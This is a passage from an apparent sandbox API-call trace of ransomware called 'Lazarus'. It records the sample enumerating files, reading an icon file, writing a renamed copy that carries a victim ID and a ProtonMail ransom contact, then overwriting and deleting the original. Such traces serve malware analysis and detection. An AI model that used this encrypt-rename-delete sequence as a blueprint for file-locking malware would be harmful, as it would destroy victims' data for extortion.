(in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.160] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x0, cFileName="Rotate5.ico", cAlternateFileName="")) returned 1 [0075.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0075.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0075.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0075.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0075.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0075.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0075.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0075.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0075.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0075.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0075.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0075.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0075.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0075.161] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.161] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.161] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.161] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0075.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.161] AreFileApisANSI () returned 1 [0075.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico", lpUsedDefaultChar=0x0) returned 43 [0075.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0075.161] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.161] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0075.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0075.162] AreFileApisANSI () returned 1 [0075.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0075.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 43 [0075.162] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0075.162] GetFileType (hFile=0x42c) returned 0x1 [0075.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0075.162] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0075.162] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0075.162] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0075.163] CloseHandle (hObject=0x42c) returned 1 [0075.163] AreFileApisANSI () returned 1 [0075.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0075.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 43 [0075.163] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0075.163] GetFileType (hFile=0x42c) returned 0x1 [0075.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0075.163] CloseHandle (hObject=0x42c) returned 1 [0075.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0075.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0075.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0075.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0075.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0075.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0075.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0075.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0075.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0075.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0075.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0075.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.165] AreFileApisANSI () returned 1 [0075.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0075.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 43 [0075.165] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e)) returned 1 [0075.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0075.165] AreFileApisANSI () returned 1 [0075.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0075.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0075.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0075.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0075.165] GetLastError () returned 0x0 [0075.165] SetLastError (dwErrCode=0x0) [0075.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4ddc8 [0075.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0075.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b450 [0075.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4f8 [0075.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0075.165] GetLastError () returned 0x0 [0075.165] SetLastError (dwErrCode=0x0) [0075.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0075.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0075.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68f40 [0075.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0075.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75d50 [0075.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0075.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0075.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0075.166] AreFileApisANSI () returned 1 [0075.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0075.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x5a6b8 [0075.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=105 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 105 [0075.166] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0075.166] GetFileType (hFile=0x42c) returned 0x1 [0075.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0075.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0075.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0075.166] AreFileApisANSI () returned 1 [0075.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67660 [0075.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x67660, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 43 [0075.167] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0075.167] GetFileType (hFile=0x410) returned 0x1 [0075.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67660 | out: hHeap=0x20000) returned 1 [0075.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0075.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0075.167] GetLastError () returned 0x0 [0075.167] SetLastError (dwErrCode=0x0) [0075.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0075.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0075.167] GetLastError () returned 0x0 [0075.167] SetLastError (dwErrCode=0x0) [0075.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0075.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0075.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0075.167] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x37e, lpOverlapped=0x0) returned 1 [0075.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0075.169] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0075.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0075.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x91458 [0075.169] GetLastError () returned 0x0 [0075.169] SetLastError (dwErrCode=0x0) [0075.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d690 [0075.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0075.169] GetLastError () returned 0x0 [0075.169] SetLastError (dwErrCode=0x0) [0075.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0075.170] WriteFile (in: hFile=0x42c, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327ef70*=0x380, lpOverlapped=0x0) returned 1 [0075.170] GetLastError () returned 0x0 [0075.171] SetLastError (dwErrCode=0x0) [0075.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0075.171] GetLastError () returned 0x0 [0075.171] SetLastError (dwErrCode=0x0) [0075.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0075.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0075.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0075.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0075.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x91458 | out: hHeap=0x20000) returned 1 [0075.171] CloseHandle (hObject=0x42c) returned 1 [0075.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0075.172] CloseHandle (hObject=0x410) returned 1 [0075.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0075.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0075.172] AreFileApisANSI () returned 1 [0075.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x66f40 [0075.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x66f40, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 43 [0075.172] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0075.173] GetFileType (hFile=0x410) returned 0x1 [0075.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x66f40 | out: hHeap=0x20000) returned 1 [0075.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0075.173] GetLastError () returned 0xb7 [0075.173] SetLastError (dwErrCode=0xb7) [0075.174] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0075.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0075.174] CloseHandle (hObject=0x410) returned 1 [0075.175] AreFileApisANSI () returned 1 [0075.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0075.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 43 [0075.175] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico")) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4f8 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b450 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0075.176] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.176] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.176] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, 